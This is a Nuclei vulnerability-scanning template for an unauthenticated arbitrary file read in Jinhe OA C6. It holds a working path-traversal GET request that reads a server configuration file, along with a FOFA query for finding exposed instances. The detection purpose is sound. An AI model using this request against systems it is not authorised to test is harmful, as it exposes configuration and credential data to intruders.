nuclei-templates/http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml

35 lines
1.4 KiB
YAML

id: jinhe-oa-c6-upload-lfi
info:
name: Jinhe OA_C6_UploadFileDownLoadnew - Arbitrary File Read
author: pussycat0x
severity: high
description: |
There is an arbitrary file reading vulnerability in the UploadFileDownLoadnew.aspx interface of Jinhe OA C6. An unauthenticated attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., causing the website to be in Extremely unsafe state.
reference:
- https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA_C6_UploadFileDownLoadnew%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
verified: true
fofa-query: body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"
tags: jinhe-oa-c6,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/c6/JHSoft.Web.CustomQuery/UploadFileDownLoadnew.aspx/?FilePath=../Resource/JHFileConfig.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "MaxFolderTotal=1"
- "[JHFile]"
- "FolderTotal=1"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220113a253a49c9efc3ebbebb7f0f7a09f5ba9591d84421330e3237cc10aaf6f542022100ec45d703a8881402fc70b28229eab7688c3b5fa5fc9e36c43b6f97dd7ecb1faf:922c64590222798bb761d5b6d8e72950